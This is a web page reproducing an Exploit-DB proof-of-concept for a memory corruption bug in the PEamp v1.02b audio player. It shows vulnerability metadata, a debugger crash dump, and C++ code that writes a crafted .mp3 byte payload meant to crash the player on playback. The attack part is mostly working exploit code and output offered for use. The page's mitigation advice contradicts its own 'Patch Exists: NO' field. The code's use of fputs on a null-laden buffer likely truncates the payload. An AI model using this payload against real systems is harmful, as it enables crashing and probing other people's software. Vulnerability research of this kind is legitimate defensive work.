header-logo
Suggest Exploit
vendor:
PEamp
by:
Ayrbyte
N/A
CVSS
MEDIUM
Memory Corruption
119
CWE
Product Name: PEamp
Affected Version From: v1.02b
Affected Version To: v1.02b
Patch Exists: NO
Related CWE:
CPE: a:peamp:peamp:1.02b
Metasploit:
Other Scripts:
Platforms Tested: Windows 7

PEamp (.mp3) Memmory Corruption PoC

This PoC demonstrates a memory corruption vulnerability in PEamp when playing a specially crafted .mp3 file. When the file is added and played in PEamp, a MCI Error Message Box is displayed. Clicking OK or closing the MessageBox will cause the program to crash.

Mitigation:

Update PEamp to a patched version that addresses the memory corruption vulnerability.
Source

Exploit-DB raw data:

/*Title: PEamp (.mp3) Memmory Corruption PoC
Author: Ayrbyte
Link: http:www.softpedia.com/get/Multimedia/Audio/Audio-Players/mp3player.shtml
Versi: v1.02b
Tested on: Windows 7
Fb: facebook.com/Ayrbyte
Greetz To : all CREMY Family, and for all indonesian indonesian h4x0r

    ??  %%  %% $$$$$        >>  > ::    ;;;;;;;;
   ?? ?  %% %% $$ $$ ||      >> > ::    ;;    ;;
  ?????   %%%% $$$$$ ||___    >>> ::::: ;;;;;;;
 ??   ??    %% $$$$  ||  ||     > ::    ;;
      %%%%%%%% $$ $$ ||__|| >>>>> ::::: ;;;;;;;;
    ______________>>Ayrbyte<<_______________
   Gamerz From CREMY | CRazy Experience arMY

[bug]
eax=00040446 ebx=00000000 ecx=7324945c edx=00000000 esi=00040446 edi=00040446
eip=7322428e esp=0012fc4c ebp=0012fc4c iopl=0         nv up ei ng nz ac pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\WINMM.dll - 
WINMM!DriverCallback+0x7bf:
7322428e 8b40d4          mov     eax,dword ptr [eax-2Ch] ds:0023:0004041a=???????? <--CRASH
*/
//[Poc :]
#include <iostream>
using namespace std;
//Add and Play PoC.mp3 to PEamp then you will see MCI Error Message Box when you klik ok or close this MessageBox
//program will be CRASH
char _isi[] =   
"\x49\x44\x33\x03\x00\x00\x00\x21\x76\x43\x4F\x4D\x4D\x00\x00\x00"
"\x00\x22\x00\x00\x00\x65\x6E\x67\x00\x4D\x41\x44\x45\x20\x42\x59"
"\x20\x3A\x20\x53\x20\x41\x20\x50\x20\x49\x20\x50\x72\x6F\x64\x75"
"\x63\x74\x69\x6F\x6E\x73\x54\x52\x43\x4B\x00\x00\x00\x02\x00\x00"
"\x00\x36\x54\x43\x4F\x4E\x00\x00\x00\x05\x00\x00\x00\x28\x31\x37"
"\x29\x54\x41\x4C\x42\x00\x00\x00\x0D\x00\x00\x00\x43\x49\x54\x59"
"\x20\x4F\x46\x20\x45\x56\x49\x4C\x54\x49\x54\x32\x00\x00\x00\x11"
"\x00\x00\x00\x30\x36\x20\x53\x65\x69\x7A\x65\x20\x54\x68\x65\x20"
"\x44\x61\x79\x50\x52\x49\x56\x00\x00\x00\x27\x00\x00\x57\x4D\x2F"
"\x4D\x65\x64\x69\x61\x43\x6C\x61\x73\x73\x50\x72\x69\x6D\x61\x72"
"\x79\x49\x44\x00\xBC\x7D\x60\xD1\x23\xE3\xE2\x4B\x86\xA1\x48\xA4"
"\x2A\x28\x44\x1E\x50\x52\x49\x56\x00\x00\x00\x29\x00\x00\x57\x4D"
"\x2F\x4D\x65\x64\x69\x61\x43\x6C\x61\x73\x73\x53\x65\x63\x6F\x6E"
"\x64\x61\x72\x79\x49\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x54\x50\x45\x31\x00\x00\x00\x12\x00"
"\x00\x00\x41\x56\x45\x4E\x47\x45\x44\x20\x53\x45\x56\x45\x4E\x46"
"\x4F\x4C\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\xFF\xFB\x92\x44\xFF\x80\x0B\xF0\x00\x4B\x80\x00\x00"
"\x08\x00\x00\x09\x70\x00\x00\x01\x00\x00\x01\x2E\x00\x00\x00\x20"
"\x00\x00\x25\xC0\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x54\x41\x47\x30\x36\x20\x53\x65\x69\x7A\x65"
"\x20\x54\x68\x65\x20\x44\x61\x79\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x41\x56\x45\x4E\x47\x45\x44\x20\x53\x45"
"\x56\x45\x4E\x46\x4F\x4C\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x43\x49\x54\x59\x20\x4F\x46\x20\x45\x56\x49\x4C"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x4D\x41\x44\x45\x20\x42\x59\x20\x3A\x20"
"\x53\x20\x41\x20\x50\x20\x49\x20\x50\x72\x6F\x64\x75\x63\x74\x69"
"\x6F\x6E\x00\x06\x11";
int main(){
    FILE *_file;
    #define _namefile "PoC.mp3"
    _file = fopen(_namefile, "w");
    fputs(_isi, _file);
    fclose(_file);
    return 0; 
}

Navigation

Suggest Exploit

Services By CQR